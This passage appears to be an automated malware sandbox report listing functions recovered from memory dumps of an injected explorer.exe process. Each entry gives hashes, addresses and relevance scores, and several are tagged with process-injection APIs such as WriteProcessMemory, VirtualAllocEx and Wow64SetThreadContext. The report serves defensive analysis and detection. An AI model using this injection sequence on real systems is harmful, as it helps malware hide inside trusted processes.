Opcode ID: 6c99b0ed55a4701976f8e5621b66cc2c3982aa29002c6167fd1ef5966fdfaf46
Instruction ID: 613461c257c7b0923d6c9c916514498e2e6580ed62eb3d2c39ea12f9a24ce504
Opcode Fuzzy Hash: 6c99b0ed55a4701976f8e5621b66cc2c3982aa29002c6167fd1ef5966fdfaf46
Instruction Fuzzy Hash: 8AF074349042A8CFDF25DF94C848BDABBB1BB46305F1884D6D809AB251C3749E84DF21

Uniqueness

Uniqueness Score: -1.00%

Function 001925F0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda9667fe7d39e6111ec898764eab7741f9671fe3c2e14dbc572a513358a1449
Instruction ID: 91398bfbe1d377aca69260d332e83fd68b7ccec889855b02b4fd2427e8d0fcd3
Opcode Fuzzy Hash: fda9667fe7d39e6111ec898764eab7741f9671fe3c2e14dbc572a513358a1449
Instruction Fuzzy Hash: F2E0B674D0424CEFCB44DFE9E84469DBBF4EB48305F1081A9D818A3750EB345A90DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05899C30 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fcd3bf164c33685f3bb32b551d3fe121bf1beb98b09f659dd6780300a6d2700
Instruction ID: d41b1d8cd56e268d41e6c41191d53bdb685a946dab5a2e18a744f5a10bc8346b
Opcode Fuzzy Hash: 0fcd3bf164c33685f3bb32b551d3fe121bf1beb98b09f659dd6780300a6d2700
Instruction Fuzzy Hash: FCE01A74D04208AFCB04DF98D9416ACFBB4EB88304F14C0AADD4463341D7319A51DB84

Uniqueness

Uniqueness Score: -1.00%

Function 001971E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9354b4bcff28a86cae585e668c6183199a59f1c13f0114333117c6f8cf1b0d
Instruction ID: 1472c05e20a72d8dffa1de6a63e067570c87e0035df603f7b60d82a1a6cb5e97
Opcode Fuzzy Hash: 2b9354b4bcff28a86cae585e668c6183199a59f1c13f0114333117c6f8cf1b0d
Instruction Fuzzy Hash: BCD0C231808208EBCB01DFE4C8045DAB7BCEF45205F1001B5C60583360EF300E80D792

Uniqueness

Uniqueness Score: -1.00%

Function 05899898 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937f62f498a3619fc469bcd32e0abae80f0a026013ba4a2aff5d7134c706afb3
Instruction ID: cc11e47656ed1174598aa6cc0608a991babb538721b340167a4890f84b0403d6
Opcode Fuzzy Hash: 937f62f498a3619fc469bcd32e0abae80f0a026013ba4a2aff5d7134c706afb3
Instruction Fuzzy Hash: AAD012714051089BCB01DFF4890159A77B9EF41204F1004BDD90593251EB314E50D691

Uniqueness

Uniqueness Score: -1.00%

Function 05896AA8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef6ba347cbb59a28e7e1a8309c25af6ce81a687e8c7ef078885507ac7efbe46
Instruction ID: 4961bd4a93e6d740a79e65ed51fda323d904e373b8415ffcbc4da7accf7a6f01
Opcode Fuzzy Hash: 1ef6ba347cbb59a28e7e1a8309c25af6ce81a687e8c7ef078885507ac7efbe46
Instruction Fuzzy Hash: 37E08C34A04208EBCB04DF94D94099CFBB4FB84304F24C0A9DD0423340D732AE92EA85

Uniqueness

Uniqueness Score: -1.00%

Function 05896128 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ff027c8a609cf4c945340a147463c70ca15d18ebee256d8a4e673ccc67de68
Instruction ID: bdef47908c520be7d7b620f4c89daedc48f6caf83366038360afe232dda73e95
Opcode Fuzzy Hash: 21ff027c8a609cf4c945340a147463c70ca15d18ebee256d8a4e673ccc67de68
Instruction Fuzzy Hash: 6DE0E270919208EFCB44EFE8D98A69DBBB8AB44206F1040A9C909A3350EB705A90DB81

Uniqueness

Uniqueness Score: -1.00%

Function 05899A38 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8646e723d18849a03e26d58a74e9b005465d3572ec91e714274188ef0178e530
Instruction ID: 99279954c3f31ce7203dab98ca54b83326bf313371fda8f3d1173bbdadb14a70
Opcode Fuzzy Hash: 8646e723d18849a03e26d58a74e9b005465d3572ec91e714274188ef0178e530
Instruction Fuzzy Hash: 44E0EC34A041089BCB04DB94D94159DBBB5EB85305F1481ADCC0957341D7315E52DA81

Uniqueness

Uniqueness Score: -1.00%

Function 001927B9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916c33e31ebfffe4ea9785ad72b1e5653a64970d99f0b8ac1ee097f4d7283661
Instruction ID: 96ddb3b5dbfc5989b38adb2a05ec5225d495afb0bb33d82a64f6650981be4f0e
Opcode Fuzzy Hash: 916c33e31ebfffe4ea9785ad72b1e5653a64970d99f0b8ac1ee097f4d7283661
Instruction Fuzzy Hash: 8AD05E34D4C644CFDB08CFF680415EDBFB9AF6A300B26902DC029A7622D33441468F01

Uniqueness

Uniqueness Score: -1.00%

Function 001915D8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f0a5d278fd4abcfef8b445b8dd72859104be484aa157161544b7d5e67ace86
Instruction ID: 531d981623f65e6fa8103e8b7ce51c21b4d2c8ce9e5110ee1f6a44293b45558f
Opcode Fuzzy Hash: 56f0a5d278fd4abcfef8b445b8dd72859104be484aa157161544b7d5e67ace86
Instruction Fuzzy Hash: B3D012B0C0520C9BDB14AFF4BA092ADBF7CA742306F5151A9E80923750DB3055D4E6A7

Uniqueness

Uniqueness Score: -1.00%

Function 00190728 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11605360aa8d1be52fd310e27bf1d5f0f48fb886cde38402f8a6f1a3f08b423f
Instruction ID: 4e3e7a78c7e3f22293a95bd45225ef9011d346e6973e9db0bbe08f055022f599
Opcode Fuzzy Hash: 11605360aa8d1be52fd310e27bf1d5f0f48fb886cde38402f8a6f1a3f08b423f
Instruction Fuzzy Hash: 21D0127080020CDFD704DFD4FC0976EF77CD746216F104198A80863660DB316D94DA95

Uniqueness

Uniqueness Score: -1.00%

Function 00191C40 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad1bd51d563419e1db5fc9f969bc6fb7de0ab105b31925bb48d4fdf4ccfc0d6
Instruction ID: 02fb0746b40a75443e470a32b68d7115b6eb9d6fe8256f68998958f686a60363
Opcode Fuzzy Hash: 1ad1bd51d563419e1db5fc9f969bc6fb7de0ab105b31925bb48d4fdf4ccfc0d6
Instruction Fuzzy Hash: DDD06778E1920AEFCF14CFA9D484AADBBF4BF09300B20511AA915E3611D7709980DF40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05890048 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

-, xrefs: 058908B9

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 7758faba78503094790c7db54bf68bea1f1214a79eb78fa96896ddb323ae4bff
Instruction ID: ffff74d3f4125e390303aa5c7f51e4b3c8181e6635228795171585dc286fdff7
Opcode Fuzzy Hash: 7758faba78503094790c7db54bf68bea1f1214a79eb78fa96896ddb323ae4bff
Instruction Fuzzy Hash: 1E411071E05A18CFEB58CF6B8D4479AFAF7AFC9201F18C1F9884CAA255DB3059858F11

Uniqueness

Uniqueness Score: -1.00%

Function 00197640 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd4ae4ba378d8449366e5e0ddb77f89fa5cb4a495977bce39bebd15beeb8f2f
Instruction ID: 5c95c7af13700af378b8dc9b7164f95ebd2af39dcbe0c62f50737e4776ff1839
Opcode Fuzzy Hash: ddd4ae4ba378d8449366e5e0ddb77f89fa5cb4a495977bce39bebd15beeb8f2f
Instruction Fuzzy Hash: FDC18375E056588FDB58CF6AC944AD9BBF2AF89304F14C0E9D809AB364DB305E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00197219 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b3365f883ce91a932b1954378c41486038a99057293293f97cdf9fddb94f36
Instruction ID: 351995fd608f871d7ee6ed63461408400b55d49c20de2099f2e7a9f0d07ea125
Opcode Fuzzy Hash: 63b3365f883ce91a932b1954378c41486038a99057293293f97cdf9fddb94f36
Instruction Fuzzy Hash: CA615071A046048FDB48EF7AE84169EBBF3AFC8304F14C879E105AB768DB7459498F91

Uniqueness

Uniqueness Score: -1.00%

Function 00197228 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e314cb45c11df1b792d7504bde2c22bbbba83bc3b69ca2b43c6a707b2f14c9fd
Instruction ID: 7420e97ce4d74d0ad2fa9d31d9595634e86c84d5f502d0b9520f43addb3ce5cf
Opcode Fuzzy Hash: e314cb45c11df1b792d7504bde2c22bbbba83bc3b69ca2b43c6a707b2f14c9fd
Instruction Fuzzy Hash: 0D614271E046048FDB48EF7AE84069A7BF3AFC8304F14C839E105AB768DB7459498F91

Uniqueness

Uniqueness Score: -1.00%

Function 01310048 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1c065d566a751d88b4a416e8fb2412f0af975cfa6a18ac1ead57658a4ff359
Instruction ID: 0c8ed4818b5f400545267243769b0e9dc7eaf43027da752ce60018da8f872713
Opcode Fuzzy Hash: ab1c065d566a751d88b4a416e8fb2412f0af975cfa6a18ac1ead57658a4ff359
Instruction Fuzzy Hash: 21414EB1E016188BEB1CCF6B8D4068AFAF7AFC9200F08C1BA950DAA259DB7145958F41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 676, Parent PID: 2540COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 002B07E0 Relevance: 9.6, Strings: 7, Instructions: 829
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 002B1029
TNGp, xrefs: 002B0D9F
TNGp, xrefs: 002B09A7
TNGp, xrefs: 002B0EF2
TNGp, xrefs: 002B0B45
TNGp, xrefs: 002B11C9
TNGp, xrefs: 002B0C7F

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: daf8b9bb34c2516ebc1e451b39f281ac4390968212e437b05c40fc581a950b30
Instruction ID: 2d13c794a541290e4c564076b68793962eef2db6fb6216b3f7e7153556604ecf
Opcode Fuzzy Hash: daf8b9bb34c2516ebc1e451b39f281ac4390968212e437b05c40fc581a950b30
Instruction Fuzzy Hash: 0382E434A10218CFD724DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002B00C8 Relevance: 9.6, Strings: 7, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 002B1029
TNGp, xrefs: 002B0D9F
TNGp, xrefs: 002B09A7
TNGp, xrefs: 002B0EF2
TNGp, xrefs: 002B0B45
TNGp, xrefs: 002B11C9
TNGp, xrefs: 002B0C7F

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: 0cfb9eb372c3244e3daf366b88bed7fbee2a2bad90e140ba726f9b81a182a65a
Instruction ID: 4dea16bd2c61307518b46d41bc36526a20a4c02224ce0f56ee56ef620906dfbf
Opcode Fuzzy Hash: 0cfb9eb372c3244e3daf366b88bed7fbee2a2bad90e140ba726f9b81a182a65a
Instruction Fuzzy Hash: E082D334A10218CFD724DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002B7650 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 002B7B22

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: 746ff34b5835afc87ebd8c9a0aa3e56b6f3d692e826bc6a5dff329952613cac6
Instruction ID: 89e56ae00978324ee10c95ea1270b18a5d340c7ec322ca286401161b5fd1eba1
Opcode Fuzzy Hash: 746ff34b5835afc87ebd8c9a0aa3e56b6f3d692e826bc6a5dff329952613cac6
Instruction Fuzzy Hash: 45A2D675A00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002B7219 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae5ad05355dda904f4904a29cb1f0411bc8831ac98b122101b0015b84e275cf
Instruction ID: 3049599467b04706d37c506017de4c166a005269ca6d2de9ed5e7b0f77604aae
Opcode Fuzzy Hash: cae5ad05355dda904f4904a29cb1f0411bc8831ac98b122101b0015b84e275cf
Instruction Fuzzy Hash: 58713E71A146088FDB44EF7AE84069EBBF3ABC8304F14C879E105AB768DB7459498F91

Uniqueness

Uniqueness Score: -1.00%

Function 04E07AF0 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04E07DB7

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c15172e889706d020583f84ce90ae45603ee3c2c486b1de5f235beeb7cd5e17c
Instruction ID: b3da0a75cbf2e0a05f72930627d1140ac45608aff2372f6afe5390d604a2626a
Opcode Fuzzy Hash: c15172e889706d020583f84ce90ae45603ee3c2c486b1de5f235beeb7cd5e17c
Instruction Fuzzy Hash: E8C12670D002598FDB20CFA4C841BEEBBB1BF49308F1095A9D959B7280DB74AAC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04E076C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 04E0779B

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e84eaac9e07249771481b49d7ca5a465ddd1adaf17f5c3a108e7d3d03b8a56c3
Instruction ID: 070e433038619bc42f613e38fa4f0ffe826b26761517c95d6cf649eb28e900be
Opcode Fuzzy Hash: e84eaac9e07249771481b49d7ca5a465ddd1adaf17f5c3a108e7d3d03b8a56c3
Instruction Fuzzy Hash: C84198B4D012589FCF00CFA9D984AEEBBF1BF49314F24942AE819B7240D734AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04E07858 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04E0790A

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 83aaaac0f228e9f8864580d38a06c33fb3195e9139390c80609794b597e8becb
Instruction ID: a1d053bf33a9792a8f9d1dd3cc5f13c3bc380b6e98efc5544e390e0a206411c5
Opcode Fuzzy Hash: 83aaaac0f228e9f8864580d38a06c33fb3195e9139390c80609794b597e8becb
Instruction Fuzzy Hash: 5941A8B5D042589FCF10CFA9D884AEEFBB1BF49314F20A42AE815B7240D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04E07570 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04E0761A

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 67ee8cd9827221889cc9bc2f8bd8ddc69a9243c012c071a5115b864444465983
Instruction ID: fc9791ce78c4505c28e2f6264890632fce01e9efcd4b230f419a0dd10b52b887
Opcode Fuzzy Hash: 67ee8cd9827221889cc9bc2f8bd8ddc69a9243c012c071a5115b864444465983
Instruction Fuzzy Hash: 2C419BB4D042589FCF10CFA9E884ADEFBB1BB49314F20A41AE815B7250D735A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04E07380 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 04E0742F

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 712462c70f1016ea9a2e8eee76cb2c12f8fdaff0ea588cecc2b94f324217df4a
Instruction ID: 956d7c7f1fa355956cf702be353b2f2636f120099c91e627c0a5f295583fa339
Opcode Fuzzy Hash: 712462c70f1016ea9a2e8eee76cb2c12f8fdaff0ea588cecc2b94f324217df4a
Instruction Fuzzy Hash: 2341BDB4D012589FDB10CFA9D884AEEFBF1BF49314F24942AE419B7240D738A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04E07260 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 04E072DE

Memory Dump Source

Source File: 00000014.00000002.991427490.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e00000_explorer.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 35bf9980bebc8ac35b693c9856dac8b210727063c767f6b11d8e446067b3b9e1
Instruction ID: 4baadf5b3f5040e674f75ccf05060a87876ad45aec3f007b3785bbb4cb77d645
Opcode Fuzzy Hash: 35bf9980bebc8ac35b693c9856dac8b210727063c767f6b11d8e446067b3b9e1
Instruction Fuzzy Hash: CD31BEB4D002189FCF10CFA9D885AEEFBB0AF49314F20942AE815B7340DB35A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002B1392 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 002B1395

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 06ad4f3609ad6c66fff6a83d108a41045d2282b00e73b791e43d68e2aca083d8
Instruction ID: 8dbe2e02e4393a690d95b5b3aea236a9e77d8ea2361c1d154b6f3bee3de520ce
Opcode Fuzzy Hash: 06ad4f3609ad6c66fff6a83d108a41045d2282b00e73b791e43d68e2aca083d8
Instruction Fuzzy Hash: 7C71A134A50128CFDB54DF24D894ED9B7B1BF8A304F1181E9D449AB361EB30AE85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002B1FC0 Relevance: 1.4, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\-<l, xrefs: 002B2036

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: \-<l
API String ID: 0-2818436665
Opcode ID: 60fb2a26c8f4e7aae6035e28486159a1f8b3a3b04521af23b20730b612e1d38e
Instruction ID: 13355fc52f9721325398624b47a33acff4f7da64a9779700473a59631a0f165d
Opcode Fuzzy Hash: 60fb2a26c8f4e7aae6035e28486159a1f8b3a3b04521af23b20730b612e1d38e
Instruction Fuzzy Hash: 7E514934D29208CFDB04DFA9D444BEDBBB6AF8A340F249029E50AB7361DBB05959DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002B70E7 Relevance: 1.4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$~, xrefs: 002B71AF

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: $~
API String ID: 0-2724473089
Opcode ID: 2fea4bbec3d70d22c1f8603f733a73796fd7161cd85e94565781a666098d830b
Instruction ID: 40b3ac40dd491e21e1736399ee53d0bf7e3090f2d99fe6198e76bef83f160385
Opcode Fuzzy Hash: 2fea4bbec3d70d22c1f8603f733a73796fd7161cd85e94565781a666098d830b
Instruction Fuzzy Hash: EE41AF6291E3C05FC7139B3858A92C5BF71AF53348B1A01DBC084DB2A3E9244D4AC763

Uniqueness

Uniqueness Score: -1.00%

Function 05F06AF0 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

$~, xrefs: 05F06B4B, 05F06B6F

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID: $~
API String ID: 0-2724473089
Opcode ID: f0e7ca0e08481dd40d1a750cc0456ef51cc4824ccfbc15ba16e9599fac8cd348
Instruction ID: df38a72da359a94e155512c8de46444552f9c67ea1d8608895b31c7944860891
Opcode Fuzzy Hash: f0e7ca0e08481dd40d1a750cc0456ef51cc4824ccfbc15ba16e9599fac8cd348
Instruction Fuzzy Hash: 45314BB1E04119CFCB04EFA9D9405EEBBFAFB89300F14A469D519F3394DB7899518B90

Uniqueness

Uniqueness Score: -1.00%

Function 05F06AEC Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

$~, xrefs: 05F06B4B, 05F06B6F

Memory Dump Source

Source File: 00000014.00000002.994886692.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5f00000_explorer.jbxd

Similarity

API ID:
String ID: $~
API String ID: 0-2724473089
Opcode ID: 378d6267d749b26965df475f2ccfc53d7a9de94cbe37aa40ebc20e24d1071dfa
Instruction ID: 804da538ce78bba5166707750bc4cfd74482024c45962c3fd52e5e11889dac55
Opcode Fuzzy Hash: 378d6267d749b26965df475f2ccfc53d7a9de94cbe37aa40ebc20e24d1071dfa
Instruction Fuzzy Hash: 1C317AB1E041098BCB04EFA9D8415AFB7BBFB89300F149469D519F3384CB78AA168B90

Uniqueness

Uniqueness Score: -1.00%

Function 002B8D61 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

$~, xrefs: 002B8D61, 002B9507, 002B999D

Memory Dump Source

Source File: 00000014.00000002.980044655.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2b0000_explorer.jbxd

Similarity

API ID:
String ID: $~
API String ID: 0-2724473089
Opcode ID: caa1afe049e25b3f5ec7bb0a8412fbc137a4b91c48bf0de63d72dd5066243293
Instruction ID: da613fb3d3474cca6a948dbf8bcff6bf8870c4feb50619d2769acdbb69913923
Opcode Fuzzy Hash: caa1afe049e25b3f5ec7bb0a8412fbc137a4b91c48bf0de63d72dd5066243293
